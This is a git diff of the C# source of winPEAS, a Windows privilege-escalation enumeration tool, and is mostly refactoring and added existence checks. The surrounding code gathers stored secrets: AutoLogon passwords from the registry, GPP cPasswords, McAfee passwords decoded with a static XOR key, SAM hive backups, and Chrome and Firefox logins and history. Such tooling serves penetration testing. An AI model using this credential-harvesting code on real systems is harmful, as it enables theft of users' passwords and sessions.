||||
foreach (var file in searchFiles)
|
||||
{
|
||||
@@ -403,7 +403,7 @@ namespace winPEAS.Helpers.Search
|
||||
".pdf",
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.RootDirCurrentUser)
|
||||
foreach (var file in RootDirCurrentUser)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
@@ -451,7 +451,7 @@ namespace winPEAS.Helpers.Search
|
||||
".pdf",
|
||||
};
|
||||
|
||||
foreach (var file in SearchHelper.RootDirUsers)
|
||||
foreach (var file in RootDirUsers)
|
||||
{
|
||||
if (!file.IsDirectory)
|
||||
{
|
||||
|
||||
@@ -8,7 +8,8 @@ namespace winPEAS.Helpers.YamlConfig
|
||||
{
|
||||
public string name { get; set; }
|
||||
public RegularExpression[] regexes { get; set; }
|
||||
public class RegularExpression {
|
||||
public class RegularExpression
|
||||
{
|
||||
public string name { get; set; }
|
||||
public string regex { get; set; }
|
||||
|
||||
|
||||
@@ -1,10 +1,9 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Yaml.Serialization;
|
||||
using System.IO;
|
||||
using System.Reflection;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Yaml.Serialization;
|
||||
using static winPEAS.Helpers.YamlConfig.YamlConfig;
|
||||
using static winPEAS.Helpers.YamlConfig.YamlRegexConfig;
|
||||
|
||||
|
||||
namespace winPEAS.Helpers.YamlConfig
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Native;
|
||||
|
||||
@@ -1,10 +1,10 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Management;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
@@ -343,6 +343,8 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
usersPath = Directory.GetParent(usersPath).FullName;
|
||||
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(usersPath))
|
||||
{
|
||||
var userDirs = Directory.EnumerateDirectories(usersPath);
|
||||
|
||||
@@ -356,6 +358,7 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
@@ -363,6 +366,8 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
foreach (string path in autorunLocations)
|
||||
{
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(path))
|
||||
{
|
||||
var files = Directory.EnumerateFiles(path, "*", SearchOption.TopDirectoryOnly);
|
||||
|
||||
@@ -382,6 +387,7 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
});
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
}
|
||||
|
||||
@@ -70,6 +70,8 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
{
|
||||
var results = new SortedDictionary<string, Dictionary<string, string>>();
|
||||
try
|
||||
{
|
||||
if (Directory.Exists(fpath))
|
||||
{
|
||||
foreach (string f in Directory.EnumerateFiles(fpath))
|
||||
{
|
||||
@@ -83,6 +85,7 @@ namespace winPEAS.Info.ApplicationInfo
|
||||
results[d] = PermissionsHelper.GetRecursivePrivs(d);
|
||||
}
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
Beaprint.GrayPrint("Error: " + ex);
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
using System.Collections.Generic;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Info.EventsInfo.PowerShell;
|
||||
|
||||
namespace winPEAS.Info.EventsInfo.ProcessCreation
|
||||
{
|
||||
|
||||
@@ -127,7 +127,7 @@ namespace winPEAS.Info.FilesInfo.McAfee
|
||||
byte[] XORKey = { 0x12, 0x15, 0x0F, 0x10, 0x11, 0x1C, 0x1A, 0x06, 0x0A, 0x1F, 0x1B, 0x18, 0x17, 0x16, 0x05, 0x19 };
|
||||
|
||||
// xor the input b64 string with the static XOR key
|
||||
var passwordBytes = System.Convert.FromBase64String(base64password);
|
||||
var passwordBytes = Convert.FromBase64String(base64password);
|
||||
for (var i = 0; i < passwordBytes.Length; i++)
|
||||
{
|
||||
passwordBytes[i] = (byte)(passwordBytes[i] ^ XORKey[i % XORKey.Length]);
|
||||
|
||||
@@ -1,9 +1,9 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Globalization;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Info.FilesInfo.Office.OneDrive;
|
||||
|
||||
@@ -1,6 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using winPEAS.Helpers;
|
||||
|
||||
|
||||
@@ -6,7 +6,6 @@ using System.Linq;
|
||||
using System.Management;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using System.Text;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Threading.Tasks;
|
||||
using winPEAS.Helpers;
|
||||
@@ -33,7 +32,7 @@ namespace winPEAS.Info.ProcessInfo
|
||||
Proc = p,
|
||||
Pth = (string)mo["ExecutablePath"],
|
||||
CommLine = (string)mo["CommandLine"],
|
||||
Owner = Helpers.HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
|
||||
Owner = HandlesHelper.GetProcU(p)["name"], //Needed inside the next foreach
|
||||
};
|
||||
|
||||
foreach (var itm in queRy)
|
||||
@@ -54,14 +53,16 @@ namespace winPEAS.Info.ProcessInfo
|
||||
}
|
||||
if ((string.IsNullOrEmpty(companyName)) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
|
||||
{
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>();
|
||||
to_add["Name"] = itm.Proc.ProcessName;
|
||||
to_add["ProcessID"] = itm.Proc.Id.ToString();
|
||||
to_add["ExecutablePath"] = itm.Pth;
|
||||
to_add["Product"] = companyName;
|
||||
to_add["Owner"] = itm.Owner == null ? "" : itm.Owner;
|
||||
to_add["isDotNet"] = isDotNet;
|
||||
to_add["CommandLine"] = itm.CommLine;
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>
|
||||
{
|
||||
["Name"] = itm.Proc.ProcessName,
|
||||
["ProcessID"] = itm.Proc.Id.ToString(),
|
||||
["ExecutablePath"] = itm.Pth,
|
||||
["Product"] = companyName,
|
||||
["Owner"] = itm.Owner == null ? "" : itm.Owner,
|
||||
["isDotNet"] = isDotNet,
|
||||
["CommandLine"] = itm.CommLine
|
||||
};
|
||||
f_results.Add(to_add);
|
||||
}
|
||||
}
|
||||
@@ -123,11 +124,13 @@ namespace winPEAS.Info.ProcessInfo
|
||||
|
||||
string hName = HandlesHelper.GetObjectName(dupHandle);
|
||||
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>();
|
||||
to_add["Handle Name"] = hName;
|
||||
to_add["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")";
|
||||
to_add["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName;
|
||||
to_add["Reason"] = handlerExp.reason;
|
||||
Dictionary<string, string> to_add = new Dictionary<string, string>
|
||||
{
|
||||
["Handle Name"] = hName,
|
||||
["Handle"] = h.HandleValue.ToString() + "(" + typeName + ")",
|
||||
["Handle Owner"] = "Pid is " + h.UniqueProcessId.ToString() + "(" + origProcInfo.name + ") with owner: " + origProcInfo.userName,
|
||||
["Reason"] = handlerExp.reason
|
||||
};
|
||||
|
||||
if (typeName == "process" || typeName == "thread")
|
||||
{
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics;
|
||||
using System.Linq;
|
||||
@@ -8,10 +9,8 @@ using System.Runtime.InteropServices;
|
||||
using System.Security.AccessControl;
|
||||
using System.ServiceProcess;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.KnownFileCreds;
|
||||
using winPEAS.Native;
|
||||
|
||||
namespace winPEAS.Info.ServicesInfo
|
||||
@@ -51,17 +50,18 @@ namespace winPEAS.Info.ServicesInfo
|
||||
|
||||
if (string.IsNullOrEmpty(companyName) || (!Regex.IsMatch(companyName, @"^Microsoft.*", RegexOptions.IgnoreCase)))
|
||||
{
|
||||
Dictionary<string, string> toadd = new Dictionary<string, string>();
|
||||
|
||||
toadd["Name"] = GetStringOrEmpty(result["Name"]);
|
||||
toadd["DisplayName"] = GetStringOrEmpty(result["DisplayName"]);
|
||||
toadd["CompanyName"] = companyName;
|
||||
toadd["State"] = GetStringOrEmpty(result["State"]);
|
||||
toadd["StartMode"] = GetStringOrEmpty(result["StartMode"]);
|
||||
toadd["PathName"] = GetStringOrEmpty(result["PathName"]);
|
||||
toadd["FilteredPath"] = binaryPath;
|
||||
toadd["isDotNet"] = isDotNet;
|
||||
toadd["Description"] = GetStringOrEmpty(result["Description"]);
|
||||
Dictionary<string, string> toadd = new Dictionary<string, string>
|
||||
{
|
||||
["Name"] = GetStringOrEmpty(result["Name"]),
|
||||
["DisplayName"] = GetStringOrEmpty(result["DisplayName"]),
|
||||
["CompanyName"] = companyName,
|
||||
["State"] = GetStringOrEmpty(result["State"]),
|
||||
["StartMode"] = GetStringOrEmpty(result["StartMode"]),
|
||||
["PathName"] = GetStringOrEmpty(result["PathName"]),
|
||||
["FilteredPath"] = binaryPath,
|
||||
["isDotNet"] = isDotNet,
|
||||
["Description"] = GetStringOrEmpty(result["Description"])
|
||||
};
|
||||
|
||||
results.Add(toadd);
|
||||
}
|
||||
|
||||
@@ -1,5 +1,5 @@
|
||||
using System.Collections.Generic;
|
||||
using Microsoft.Win32;
|
||||
using Microsoft.Win32;
|
||||
using System.Collections.Generic;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
|
||||
@@ -3,7 +3,6 @@ using System.IO;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.AccessControl;
|
||||
using winPEAS.Native;
|
||||
using System.Security.Principal;
|
||||
|
||||
|
||||
namespace winPEAS.Info.SystemInfo.NamedPipes
|
||||
@@ -51,7 +50,7 @@ namespace winPEAS.Info.SystemInfo.NamedPipes
|
||||
{
|
||||
var security = File.GetAccessControl($"\\\\.\\pipe\\{namedPipe}");
|
||||
sddl = security.GetSecurityDescriptorSddlForm(AccessControlSections.All);
|
||||
List<string> currentUserPermsList = winPEAS.Helpers.PermissionsHelper.GetMyPermissionsF(security, winPEAS.Checks.Checks.CurrentUserSiDs);
|
||||
List<string> currentUserPermsList = Helpers.PermissionsHelper.GetMyPermissionsF(security, Checks.Checks.CurrentUserSiDs);
|
||||
currentUserPerms = string.Join(", ", currentUserPermsList);
|
||||
}
|
||||
catch
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Diagnostics.Eventing.Reader;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
|
||||
@@ -9,7 +9,6 @@ using System.Net.NetworkInformation;
|
||||
using System.Windows.Forms;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.KnownFileCreds;
|
||||
|
||||
namespace winPEAS.Info.SystemInfo
|
||||
{
|
||||
|
||||
@@ -1,7 +1,5 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
|
||||
namespace winPEAS.Info.SystemInfo.WindowsDefender
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.Info.SystemInfo.WindowsDefender
|
||||
namespace winPEAS.Info.SystemInfo.WindowsDefender
|
||||
{
|
||||
class WindowsDefenderSettingsInfo
|
||||
{
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Classes;
|
||||
|
||||
|
||||
@@ -2,7 +2,6 @@
|
||||
using System.Collections.Generic;
|
||||
using System.Net.NetworkInformation;
|
||||
using System.Security.Principal;
|
||||
using System.Text.RegularExpressions;
|
||||
using winPEAS.Helpers;
|
||||
|
||||
namespace winPEAS.Info.UserInfo
|
||||
|
||||
@@ -3,7 +3,6 @@ using System.Collections.Generic;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Cryptography.X509Certificates;
|
||||
using System.Text;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Structs;
|
||||
|
||||
|
||||
@@ -7,7 +7,6 @@ using System.Management;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Security.Principal;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.KnownFileCreds;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Structs;
|
||||
|
||||
|
||||
@@ -6,7 +6,6 @@ using System.Windows.Forms;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
using winPEAS.Info.UserInfo.SAM;
|
||||
using winPEAS.KnownFileCreds;
|
||||
using winPEAS.Native;
|
||||
using winPEAS.Native.Enums;
|
||||
|
||||
@@ -251,14 +250,15 @@ namespace winPEAS.Info.UserInfo
|
||||
|
||||
public static Dictionary<string, string> GetAutoLogon()
|
||||
{
|
||||
Dictionary<string, string> results = new Dictionary<string, string>();
|
||||
|
||||
results["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName");
|
||||
results["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName");
|
||||
results["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword");
|
||||
results["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName");
|
||||
results["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName");
|
||||
results["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword");
|
||||
Dictionary<string, string> results = new Dictionary<string, string>
|
||||
{
|
||||
["DefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultDomainName"),
|
||||
["DefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultUserName"),
|
||||
["DefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "DefaultPassword"),
|
||||
["AltDefaultDomainName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultDomainName"),
|
||||
["AltDefaultUserName"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultUserName"),
|
||||
["AltDefaultPassword"] = RegistryHelper.GetRegValue("HKLM", "SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon", "AltDefaultPassword")
|
||||
};
|
||||
return results;
|
||||
}
|
||||
|
||||
|
||||
@@ -15,7 +15,7 @@ namespace winPEAS.InterestingFiles
|
||||
|
||||
try
|
||||
{
|
||||
string allUsers = System.Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
|
||||
string allUsers = Environment.GetEnvironmentVariable("ALLUSERSPROFILE");
|
||||
|
||||
if (!allUsers.Contains("ProgramData"))
|
||||
{
|
||||
@@ -225,11 +225,13 @@ namespace winPEAS.InterestingFiles
|
||||
Changed = "[BLANK]";
|
||||
}
|
||||
|
||||
results[file] = new Dictionary<string, string>();
|
||||
results[file]["UserName"] = UserName;
|
||||
results[file]["NewName"] = NewName;
|
||||
results[file]["cPassword"] = cPassword;
|
||||
results[file]["Changed"] = Changed;
|
||||
results[file] = new Dictionary<string, string>
|
||||
{
|
||||
["UserName"] = UserName,
|
||||
["NewName"] = NewName,
|
||||
["cPassword"] = cPassword,
|
||||
["Changed"] = Changed
|
||||
};
|
||||
}
|
||||
}
|
||||
catch (Exception ex)
|
||||
|
||||
@@ -28,7 +28,7 @@ namespace winPEAS.InterestingFiles
|
||||
$@"{systemRoot}\System32\config\RegBack\SYSTEM",
|
||||
};
|
||||
|
||||
results.AddRange(searchLocations.Where(searchLocation => System.IO.File.Exists(searchLocation)));
|
||||
results.AddRange(searchLocations.Where(searchLocation => File.Exists(searchLocation)));
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
@@ -102,7 +102,7 @@ namespace winPEAS.InterestingFiles
|
||||
// Reference: https://stackoverflow.com/questions/18071412/list-filenames-in-the-recyclebin-with-c-sharp-without-using-any-external-files
|
||||
int lastDays = 30;
|
||||
|
||||
var startTime = System.DateTime.Now.AddDays(-lastDays);
|
||||
var startTime = DateTime.Now.AddDays(-lastDays);
|
||||
|
||||
// Shell COM object GUID
|
||||
Type shell = Type.GetTypeFromCLSID(new Guid("13709620-C279-11CE-A49E-444553540000"));
|
||||
|
||||
@@ -40,7 +40,7 @@ namespace winPEAS.InterestingFiles
|
||||
|
||||
try
|
||||
{
|
||||
var winDir = System.Environment.GetEnvironmentVariable("windir");
|
||||
var winDir = Environment.GetEnvironmentVariable("windir");
|
||||
string[] searchLocations =
|
||||
{
|
||||
$"{winDir}\\sysprep\\sysprep.xml",
|
||||
@@ -56,7 +56,7 @@ namespace winPEAS.InterestingFiles
|
||||
$"{winDir}\\..\\unattend.inf",
|
||||
};
|
||||
|
||||
results.AddRange(searchLocations.Where(System.IO.File.Exists));
|
||||
results.AddRange(searchLocations.Where(File.Exists));
|
||||
}
|
||||
catch (Exception ex)
|
||||
{
|
||||
|
||||
@@ -1,6 +1,7 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Web.Script.Serialization;
|
||||
using winPEAS.Checks;
|
||||
@@ -27,7 +28,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
{
|
||||
Beaprint.MainPrint("Looking for Chrome DBs");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
Dictionary<string, string> chromeDBs = Chrome.GetChromeDbs();
|
||||
Dictionary<string, string> chromeDBs = GetChromeDbs();
|
||||
|
||||
if (chromeDBs.ContainsKey("userChromeCookiesPath"))
|
||||
{
|
||||
@@ -59,7 +60,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
{
|
||||
Beaprint.MainPrint("Looking for GET credentials in Chrome history");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
Dictionary<string, List<string>> chromeHistBook = Chrome.GetChromeHistBook();
|
||||
Dictionary<string, List<string>> chromeHistBook = GetChromeHistBook();
|
||||
List<string> history = chromeHistBook["history"];
|
||||
List<string> bookmarks = chromeHistBook["bookmarks"];
|
||||
|
||||
@@ -77,8 +78,11 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
Beaprint.AnsiPrint(" " + url, colorsB);
|
||||
}
|
||||
}
|
||||
|
||||
Console.WriteLine();
|
||||
|
||||
int limit = 50;
|
||||
Beaprint.MainPrint($"Chrome history -- limit {limit}\n");
|
||||
Beaprint.ListPrint(history.Take(limit).ToList());
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -130,14 +134,14 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
else
|
||||
{
|
||||
string userChromeCookiesPath =
|
||||
$"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
|
||||
$"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies";
|
||||
if (File.Exists(userChromeCookiesPath))
|
||||
{
|
||||
results["userChromeCookiesPath"] = userChromeCookiesPath;
|
||||
}
|
||||
|
||||
string userChromeLoginDataPath =
|
||||
$"{System.Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
|
||||
$"{Environment.GetEnvironmentVariable("USERPROFILE")}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data";
|
||||
if (File.Exists(userChromeLoginDataPath))
|
||||
{
|
||||
results["userChromeLoginDataPath"] = userChromeLoginDataPath;
|
||||
@@ -156,7 +160,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
List<string> results = new List<string>();
|
||||
|
||||
// parses a Chrome history file via regex
|
||||
if (System.IO.File.Exists(path))
|
||||
if (File.Exists(path))
|
||||
{
|
||||
Regex historyRegex = new Regex(@"(http|ftp|https|file)://([\w_-]+(?:(?:\.[\w_-]+)+))([\w.,@?^=%&:/~+#-]*[\w@?^=%&/~+#-])?");
|
||||
|
||||
@@ -217,10 +221,10 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
}
|
||||
else
|
||||
{
|
||||
string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
string userChromeHistoryPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
results["history"] = ParseChromeHistory(userChromeHistoryPath);
|
||||
|
||||
string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", System.Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
string userChromeBookmarkPath = string.Format("{0}\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Bookmarks", Environment.GetEnvironmentVariable("USERPROFILE"));
|
||||
|
||||
results["bookmarks"] = ParseChromeBookmarks(userChromeBookmarkPath);
|
||||
}
|
||||
@@ -241,7 +245,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Chrome
|
||||
{
|
||||
try
|
||||
{
|
||||
string contents = System.IO.File.ReadAllText(path);
|
||||
string contents = File.ReadAllText(path);
|
||||
|
||||
// reference: http://www.tomasvera.com/programming/using-javascriptserializer-to-parse-json-objects/
|
||||
JavaScriptSerializer json = new JavaScriptSerializer();
|
||||
|
||||
@@ -1,10 +1,4 @@
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.Linq;
|
||||
using System.Text;
|
||||
using System.Threading.Tasks;
|
||||
|
||||
namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
class FFLogins
|
||||
{
|
||||
|
||||
@@ -4,11 +4,11 @@ using System.Data;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Text.RegularExpressions;
|
||||
using System.Web.Script.Serialization;
|
||||
using winPEAS._3rdParty.SQLite;
|
||||
using winPEAS.Checks;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.KnownFileCreds.Browsers.Models;
|
||||
using winPEAS._3rdParty.SQLite;
|
||||
using System.Web.Script.Serialization;
|
||||
|
||||
namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
@@ -29,7 +29,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
Beaprint.MainPrint("Looking for Firefox DBs");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
List<string> firefoxDBs = Firefox.GetFirefoxDbs();
|
||||
List<string> firefoxDBs = GetFirefoxDbs();
|
||||
if (firefoxDBs.Count > 0)
|
||||
{
|
||||
foreach (string firefoxDB in firefoxDBs) //No Beaprints because line needs red
|
||||
@@ -56,21 +56,26 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
{
|
||||
Beaprint.MainPrint("Looking for GET credentials in Firefox history");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
List<string> firefoxHist = Firefox.GetFirefoxHistory();
|
||||
if (firefoxHist.Count > 0)
|
||||
List<string> history = GetFirefoxHistory();
|
||||
if (history.Count > 0)
|
||||
{
|
||||
Dictionary<string, string> colorsB = new Dictionary<string, string>()
|
||||
{
|
||||
{ Globals.PrintCredStrings, Beaprint.ansi_color_bad },
|
||||
};
|
||||
|
||||
foreach (string url in firefoxHist)
|
||||
foreach (string url in history)
|
||||
{
|
||||
if (MyUtils.ContainsAnyRegex(url.ToUpper(), Browser.CredStringsRegex))
|
||||
{
|
||||
Beaprint.AnsiPrint(" " + url, colorsB);
|
||||
}
|
||||
}
|
||||
Console.WriteLine();
|
||||
|
||||
int limit = 50;
|
||||
Beaprint.MainPrint($"Firefox history -- limit {limit}\n");
|
||||
Beaprint.ListPrint(history.Take(limit).ToList());
|
||||
}
|
||||
else
|
||||
{
|
||||
@@ -101,7 +106,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
if (!(dir.EndsWith("Public") || dir.EndsWith("Default") || dir.EndsWith("Default User") || dir.EndsWith("All Users")))
|
||||
{
|
||||
string userFirefoxBasePath = $"{dir}\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\";
|
||||
if (System.IO.Directory.Exists(userFirefoxBasePath))
|
||||
if (Directory.Exists(userFirefoxBasePath))
|
||||
{
|
||||
var directories = Directory.EnumerateDirectories(userFirefoxBasePath);
|
||||
foreach (string directory in directories)
|
||||
@@ -248,6 +253,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
}
|
||||
|
||||
foreach (string dir in dirs)
|
||||
{
|
||||
if (Directory.Exists(dir))
|
||||
{
|
||||
string[] files = Directory.EnumerateFiles(dir, "signons.sqlite").ToArray();
|
||||
if (files.Length > 0)
|
||||
@@ -269,6 +276,7 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
FFDecryptor.NSS_Init(dir);
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
@@ -313,8 +321,8 @@ namespace winPEAS.KnownFileCreds.Browsers.Firefox
|
||||
|
||||
foreach (Browsers.Firefox.LoginData loginData in ffLoginData.logins)
|
||||
{
|
||||
string username = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedUsername);
|
||||
string password = Browsers.Firefox.FFDecryptor.Decrypt(loginData.encryptedPassword);
|
||||
string username = FFDecryptor.Decrypt(loginData.encryptedUsername);
|
||||
string password = FFDecryptor.Decrypt(loginData.encryptedPassword);
|
||||
logins.Add(new CredentialModel
|
||||
{
|
||||
Username = username,
|
||||
|
||||
@@ -1,11 +1,11 @@
|
||||
using System;
|
||||
using Microsoft.Win32;
|
||||
using System;
|
||||
using System.Collections.Generic;
|
||||
using System.IO;
|
||||
using System.Linq;
|
||||
using System.Reflection;
|
||||
using System.Runtime.InteropServices;
|
||||
using System.Text.RegularExpressions;
|
||||
using Microsoft.Win32;
|
||||
using winPEAS.Checks;
|
||||
using winPEAS.Helpers;
|
||||
using winPEAS.Helpers.Registry;
|
||||
@@ -30,7 +30,7 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
{
|
||||
Beaprint.MainPrint("Current IE tabs");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
List<string> urls = InternetExplorer.GetCurrentIETabs();
|
||||
List<string> urls = GetCurrentIETabs();
|
||||
|
||||
Dictionary<string, string> colorsB = new Dictionary<string, string>()
|
||||
{
|
||||
@@ -51,9 +51,9 @@ namespace winPEAS.KnownFileCreds.Browsers
|
||||
{
|
||||
Beaprint.MainPrint("Looking for GET credentials in IE history");
|
||||
Beaprint.LinkPrint("https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#browsers-history");
|
||||
Dictionary<string, List<string>> chromeHistBook = InternetExplorer.GetIEHistFav();
|
||||
List<string> history = chromeHistBook["history"];
|
||||
List<string> favorites = chromeHistBook["favorites"];
|
||||
